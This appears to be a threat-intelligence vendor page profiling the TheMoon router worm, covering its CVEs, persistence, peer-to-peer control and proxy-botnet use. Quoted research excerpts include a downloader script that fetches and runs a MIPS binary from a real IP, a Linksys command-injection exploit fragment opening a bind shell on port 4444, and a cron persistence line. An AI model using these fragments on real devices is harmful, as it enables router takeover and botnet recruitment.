TheMoon is a router-targeting worm and botnet malware family first identified by the SANS Internet Storm Center in 2014. It compromises internet-exposed small-office and home-office routers and other embedded devices through firmware vulnerabilities, enrolling them into attacker-controlled networks. Documented targets include Linksys and ASUS routers, with variants also observed targeting IP cameras. Its payloads include Linux ELF binaries compiled for MIPS architectures. Exploited vulnerabilities include unauthenticated command injection in Linksys E-Series routers, subsequently catalogued as CVE-2025-34037, and CVE-2014-9583 in ASUS routers.
TheMoon variants support peer-to-peer command distribution and the downloading and execution of additional payloads. An analyzed variant registers with hard-coded peers, forwards messages using a time-to-live mechanism, and retrieves executable payloads following commands received from recognized peers. It modifies device firewall rules to block competing infections and preserve attacker access. Some variants communicate without encryption. Persistent ASUS infections use startup execution and scheduled tasks in writable flash storage, prevent that storage from being erased, and manipulate executable search precedence so a malicious component masquerading as an NTP client runs instead of the legitimate program.
TheMoon infections can deploy SOCKS proxies, converting compromised routers into infrastructure for relaying third-party traffic. The family has been associated with the Faceless residential proxy service and with the 5socks and Anyproxy services dismantled by U.S. authorities in May 2025. Its victims include consumer and business-operated routers, particularly older or unpatched devices exposed to the internet.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
2 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
An OS command injection vulnerability exists in various models of E-Series Linksys routers via the /tmUnblock.cgi and /hndUnblock.cgi endpoints over HTTP on port 8080. This vulnerability was reported to be exploited in the wild by the "TheMoon" worm in 2014 to deploy a MIPS ELF payload. Exploitation evidence was observed by the Shadowserver Foundation on 2025-02-06 UTC.
we discussed the active detection of vulnerability CVE-2014-9583 in ASUS routers since June of this year... Figure 1 Exploitation of CVE-2014-9583 | This bot belongs to the TheMoon family of malware... Conclusion The TheMoon family was first discovered by SANS ISC in 2014. This family targets routers and installs malware by exploiting their vulnerabilities.
17 distinct techniques documented for this family, organized by ATT&CK tactic.
Het .asusrouter script wordt automatisch door de ASUSWRT-firmware aangeroepen tijdens het opstarten ... 'cru a 8ewMqdWf9K "22 17,8,16 * * * /jffs/.asusrouter"'.
ttcp_ip=-h `" . $payload . "`& ... build_packet ( $host , $port , $vuln , "/tmp/c0d3z" ) | msfpayload linux/mipsle/shell_bind_tcp LPORT=4444 ... Attempting to get a shell... fsockopen ( $host , 4444
Below is the content of file nmlt1.sh downloaded from hxxp://78.128.92.137:80/. #!/bin/sh cd /tmp rm -f .nttpd wget -O .nttpd http://78.128.92.137/.nttpd,17-mips-le-t1 chmod +x .nttpd ./.nttpd
Embedded JavaScript code is extracted and sent to the command and control (C&C) server. The C&C server will execute JavaScript code and respond with a result... Bot sends a request to the C&C URL and gets a valid (shared) Google reCAPTCHA response token.
Verspreid over de verschillende shell-scripts stuurt de malware telemetrie naar de C2-server ... GET /asi.ko ... GET /asi.ok.
Deze software creëert een socks5 proxy wat vermoedelijk gebruikt wordt door actoren om malicieuze activiteiten te ontplooien.
24 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
21 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A worm historically known for exploiting the Linksys /tmUnblock.cgi vulnerability on E-series routers.
Malware infecting older Linksys and Cisco routers and used to turn them into residential proxy infrastructure.
AryStinger follows the same pattern seen in campaigns such as AVrecon, SocksEscort, and TheMoon.
Referenced historically as malware used to turn routers into residential proxies.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.